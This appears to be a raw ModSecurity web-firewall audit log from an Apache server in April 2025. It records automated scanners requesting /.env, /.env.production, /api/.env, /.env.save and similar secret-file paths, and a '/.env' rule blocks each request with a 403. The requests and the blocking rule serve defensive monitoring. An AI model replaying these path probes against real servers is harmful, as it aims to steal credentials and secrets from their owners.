Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745198859059858 763 (- - -) Stopwatch2: 1745198859059858 763; combined=323, p1=288, p2=0, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f3ffe75-Z-- --38d5dc31-A-- [21/Apr/2025:09:05:15 +0700] aAWn25jcgo97ICfbW9PyhgAAABQ 103.236.140.4 35588 103.236.140.4 8181 --38d5dc31-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 206.189.95.232 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 206.189.95.232 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --38d5dc31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --38d5dc31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745201115804904 755 (- - -) Stopwatch2: 1745201115804904 755; combined=278, p1=246, p2=0, p3=0, p4=0, p5=32, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38d5dc31-Z-- --8207894d-A-- [21/Apr/2025:09:05:18 +0700] aAWn3pjcgo97ICfbW9PyiQAAAAA 103.236.140.4 35620 103.236.140.4 8181 --8207894d-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 138.197.191.87 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 138.197.191.87 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --8207894d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8207894d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745201118584987 759 (- - -) Stopwatch2: 1745201118584987 759; combined=312, p1=274, p2=0, p3=0, p4=0, p5=37, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8207894d-Z-- --e9240911-A-- [21/Apr/2025:10:35:25 +0700] aAW8_XgNnYly62OFre5DEQAAAEA 103.236.140.4 57640 103.236.140.4 8181 --e9240911-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.170 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; MI 8 Build/PKQ1.180729.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/67.0.3396.87 XWEB/882 MMWEBSDK/190506 Mobile Safari/537.36 MMWEBID/409 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/WIFI Language/zh_CN Accept-Charset: utf-8 --e9240911-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9240911-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745206525056252 777 (- - -) Stopwatch2: 1745206525056252 777; combined=311, p1=263, p2=0, p3=0, p4=0, p5=48, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9240911-Z-- --199e873e-A-- [21/Apr/2025:13:15:04 +0700] aAXiaHfk8_rbvOkGr1raFwAAAJU 103.236.140.4 39030 103.236.140.4 8181 --199e873e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 Accept-Charset: utf-8 --199e873e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --199e873e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745216104976538 781 (- - -) Stopwatch2: 1745216104976538 781; combined=344, p1=308, p2=0, p3=0, p4=0, p5=36, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --199e873e-Z-- --a50b3c29-A-- [21/Apr/2025:14:22:43 +0700] aAXyQ3fk8_rbvOkGr1rd6gAAAIQ 103.236.140.4 55182 103.236.140.4 8181 --a50b3c29-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; MI 5 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044807 Mobile Safari/537.36 MMWEBID/3072 MicroMessenger/7.0.3.1400(0x2700033C) Process/tools NetType/WIFI Language/zh_CN Accept-Charset: utf-8 --a50b3c29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a50b3c29-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745220163555971 845 (- - -) Stopwatch2: 1745220163555971 845; combined=355, p1=308, p2=0, p3=0, p4=0, p5=46, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a50b3c29-Z-- --8c4cd10c-A-- [21/Apr/2025:15:50:40 +0700] aAYG4HgNnYly62OFre5V2AAAAEA 103.236.140.4 48284 103.236.140.4 8181 --8c4cd10c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 128.199.133.65 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 128.199.133.65 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --8c4cd10c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c4cd10c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745225440572637 874 (- - -) Stopwatch2: 1745225440572637 874; combined=351, p1=302, p2=0, p3=0, p4=0, p5=49, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c4cd10c-Z-- --571d3170-A-- [21/Apr/2025:16:08:26 +0700] aAYLCnfk8_rbvOkGr1rkLwAAAIU 103.236.140.4 52566 103.236.140.4 8181 --571d3170-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.34 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 Accept-Charset: utf-8 --571d3170-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --571d3170-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745226506102248 854 (- - -) Stopwatch2: 1745226506102248 854; combined=344, p1=301, p2=0, p3=0, p4=0, p5=43, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --571d3170-Z-- --ce8adf67-A-- [21/Apr/2025:20:29:32 +0700] aAZIPHgNnYly62OFre6sfgAAAFI 103.236.140.4 34042 103.236.140.4 8181 --ce8adf67-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.106 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --ce8adf67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce8adf67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745242172154290 833 (- - -) Stopwatch2: 1745242172154290 833; combined=358, p1=318, p2=0, p3=0, p4=0, p5=40, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce8adf67-Z-- --de20f70a-A-- [21/Apr/2025:20:29:32 +0700] aAZIPJjcgo97ICfbW9NzDAAAABM 103.236.140.4 34056 103.236.140.4 8181 --de20f70a-B-- GET /config/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.106 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --de20f70a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de20f70a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745242172349625 804 (- - -) Stopwatch2: 1745242172349625 804; combined=373, p1=320, p2=0, p3=0, p4=0, p5=52, sr=119, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de20f70a-Z-- --00d10509-A-- [21/Apr/2025:20:29:32 +0700] aAZIPHgNnYly62OFre6sgAAAAEs 103.236.140.4 34070 103.236.140.4 8181 --00d10509-B-- GET /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.106 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --00d10509-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00d10509-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745242172518965 782 (- - -) Stopwatch2: 1745242172518965 782; combined=338, p1=299, p2=0, p3=0, p4=0, p5=38, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00d10509-Z-- --c0e2a625-A-- [21/Apr/2025:20:29:32 +0700] aAZIPJjcgo97ICfbW9NzDwAAABQ 103.236.140.4 34080 103.236.140.4 8181 --c0e2a625-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.106 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --c0e2a625-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0e2a625-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745242172730484 757 (- - -) Stopwatch2: 1745242172730484 757; combined=304, p1=271, p2=0, p3=0, p4=0, p5=33, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0e2a625-Z-- --0e62687d-A-- [21/Apr/2025:20:29:33 +0700] aAZIPZjcgo97ICfbW9NzEwAAABE 103.236.140.4 34102 103.236.140.4 8181 --0e62687d-B-- GET /settings/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.106 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --0e62687d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e62687d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745242173111821 715 (- - -) Stopwatch2: 1745242173111821 715; combined=272, p1=237, p2=0, p3=0, p4=0, p5=34, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e62687d-Z-- --f0825a55-A-- [21/Apr/2025:20:45:54 +0700] aAZMEpjcgo97ICfbW9OCBgAAAAE 103.236.140.4 58522 103.236.140.4 8181 --f0825a55-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 172.98.33.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 172.98.33.75 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --f0825a55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0825a55-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745243154312607 712 (- - -) Stopwatch2: 1745243154312607 712; combined=245, p1=216, p2=0, p3=0, p4=0, p5=29, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0825a55-Z-- --fc307a07-A-- [21/Apr/2025:22:46:31 +0700] aAZoV3gNnYly62OFre4UkgAAAEM 103.236.140.4 46940 103.236.140.4 8181 --fc307a07-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 2.58.56.225 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 2.58.56.225 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --fc307a07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc307a07-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745250391210483 1075 (- - -) Stopwatch2: 1745250391210483 1075; combined=422, p1=380, p2=0, p3=0, p4=0, p5=42, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc307a07-Z-- --43dc772f-A-- [21/Apr/2025:23:35:06 +0700] aAZzunfk8_rbvOkGr1q3aAAAAIA 103.236.140.4 60772 103.236.140.4 8181 --43dc772f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 128.199.133.65 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 128.199.133.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --43dc772f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43dc772f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745253306287474 598 (- - -) Stopwatch2: 1745253306287474 598; combined=220, p1=192, p2=0, p3=0, p4=0, p5=28, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43dc772f-Z-- --6bbaa35b-A-- [22/Apr/2025:01:27:14 +0700] aAaOAngNnYly62OFre6zWgAAAEE 103.236.140.4 48472 103.236.140.4 8181 --6bbaa35b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.17 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.17 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --6bbaa35b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6bbaa35b-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745260034769531 761 (- - -) Stopwatch2: 1745260034769531 761; combined=320, p1=285, p2=0, p3=0, p4=0, p5=35, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6bbaa35b-Z-- --ceb8ea0a-A-- [22/Apr/2025:01:27:18 +0700] aAaOBngNnYly62OFre6zZAAAAEk 103.236.140.4 48648 103.236.140.4 8181 --ceb8ea0a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.17 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.17 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --ceb8ea0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ceb8ea0a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745260038248135 817 (- - -) Stopwatch2: 1745260038248135 817; combined=346, p1=301, p2=0, p3=0, p4=0, p5=45, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ceb8ea0a-Z-- --efe50865-A-- [22/Apr/2025:02:53:14 +0700] aAaiKqLIR8aniCwJv2WoTQAAAMk 103.236.140.4 58634 103.236.140.4 8181 --efe50865-B-- GET /env/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.178.110.157 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.178.110.157 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --efe50865-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --efe50865-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745265194824381 748 (- - -) Stopwatch2: 1745265194824381 748; combined=272, p1=235, p2=0, p3=0, p4=0, p5=37, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --efe50865-Z-- --40c0d846-A-- [22/Apr/2025:02:53:15 +0700] aAaiK6LIR8aniCwJv2WoTwAAAMY 103.236.140.4 58672 103.236.140.4 8181 --40c0d846-B-- GET /favs/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.178.110.157 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.178.110.157 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --40c0d846-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40c0d846-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745265195514545 623 (- - -) Stopwatch2: 1745265195514545 623; combined=255, p1=225, p2=0, p3=0, p4=0, p5=30, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40c0d846-Z-- --da0be70b-A-- [22/Apr/2025:02:53:16 +0700] aAaiLHgNnYly62OFre7ysAAAAEA 103.236.140.4 58706 103.236.140.4 8181 --da0be70b-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.178.110.157 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.178.110.157 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --da0be70b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da0be70b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag 